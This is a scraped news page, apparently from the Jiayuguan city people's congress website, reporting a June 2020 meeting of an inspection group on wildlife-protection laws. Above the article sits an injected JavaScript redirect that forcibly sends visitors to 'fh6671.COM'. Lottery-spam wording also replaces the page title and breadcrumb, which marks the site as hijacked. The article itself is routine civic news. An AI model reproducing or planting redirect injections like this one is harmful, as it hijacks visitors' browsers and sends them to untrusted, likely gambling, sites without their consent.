function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

全天人工计划


欢迎您登录嘉峪关人大网站!
当前位置:全天人工计划  >>  新工作动态  >>  监督纵横  >>  法律监督  
市人大常委会“两法两决定”执法检查组第一次全体会议召开
来源: 嘉峪关日报      日期: 2020-06-17      作者: 朱玲      点击数:

市人大常委会“两法两决定”执法检查组第一次全体会议召开

王进平出席并讲话

嘉峪关日报讯(记者朱玲)6​月17日,市人大常委会“两法两决定”执法检查组第一次全体会议召开。市人大常委会党组书记、主任王进平出席会议并讲话;市人大常委会副主任韩峻峰主持会议。

王进平指出,开展全国人大《关于全面禁止非法野生动物交易、革除滥食野生动物陋习、切实保障人民群众生命健康安全的决定》《中华人民共和国野生动物保护法》及省人大《关于全面禁止非法野生动物交易、革除滥食野生动物陋习、切实保障人民群众生命健康安全的决定》《甘肃省实施<中华人民共和国野生动物保护法>办法》执法检查,要坚持以习近平新时代中国特色社会主义思想为指导,全面贯彻落实习近平总书记关于强化公共卫生法治保障的重要指示要求,依法保护野生动物,健全完善法律制度,进一步筑牢织密维护公共卫生安全法治防线,推动生态文明建设。

王进平强调,要提高政治站位,准确把握执法检查的重要意义和目标任务,把“两法两决定”执法检查摆在讲政治、讲大局的高度,以严肃认真的态度抓紧抓好抓出实效。要结合工作实际,进一步加大“两法两决定”的宣传和执法力度,做到线上与线下、宣传与执法、巡护与入户、禁食与补偿、关闭与转型、内管与外防等多方面结合,使执法检查各项工作抓紧抓实、落到实处。要加强法制建设、增强法治意识,进一步加强部门协作,完善联合执法机制,推动政府、组织、公众共同行动,革除滥食野生动物陋习,切实保障人民群众生命健康安全,促进我市经济社会全面发展。

会上,法律专家对“两法两决定”作了解读;各相关部门汇报了我市贯彻执行“两法两决定”情况。

执法检查组全体成员及市人大常委会农业城建环保工委全体人员参加会议。